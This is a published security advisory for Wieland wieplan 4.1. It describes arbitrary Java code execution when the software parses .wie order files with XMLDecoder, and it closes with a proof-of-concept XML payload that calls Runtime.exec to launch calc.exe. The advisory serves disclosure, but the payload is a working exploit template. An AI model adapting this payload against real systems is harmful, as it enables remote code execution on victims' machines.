50 lines
No EOL
1.5 KiB
Text
50 lines
No EOL
1.5 KiB
Text
Wieland wieplan 4.1 Document Parsing Java Code Execution Using XMLDecoder
|
|
|
|
|
|
Vendor: Wieland Electric GmbH
|
|
Product web page: http://www.wieland-electric.com
|
|
Affected version: 4.1 (Build 9)
|
|
|
|
Summary: Your new software for the configuration
|
|
of Wieland terminal rails. wieplan enables you to
|
|
plan a complete terminal rail in a very simple way
|
|
and to then place an order with Wieland. The configured
|
|
terminal rail can be stored in DXF format and read
|
|
into a CAD tool for further processing. Due to the
|
|
intuitive user interface, the configuration of terminal
|
|
rails with wieplan is easy.
|
|
|
|
Desc: wieplan suffers from an arbitrary java code
|
|
execution when parsing WIE documents that uses XMLDecoder,
|
|
allowing system access to the affected machine. The
|
|
software is used to generate custom specification
|
|
order saved in .wie XML file that has to be sent
|
|
to the vendor offices to be processed.
|
|
|
|
Tested on: Microsoft Windows 7 Professional SP1 (EN)
|
|
Microsoft Windows 7 Ultimate SP1 (EN)
|
|
Java/1.8.0_73
|
|
Java/1.6.0_62
|
|
|
|
|
|
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
@zeroscience
|
|
|
|
|
|
Advisory ID: ZSL-2016-5304
|
|
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5304.php
|
|
|
|
|
|
25.11.2016
|
|
|
|
---
|
|
|
|
|
|
<?xml version="1.0" encoding="UTF-8"?>
|
|
<java version="1.6.0_02" class="java.beans.XMLDecoder">
|
|
<object class="java.lang.Runtime" method="getRuntime">
|
|
<void method="exec">
|
|
<string>c:\\windows\\system32\\calc.exe</string>
|
|
</void>
|
|
</object>
|
|
</java> |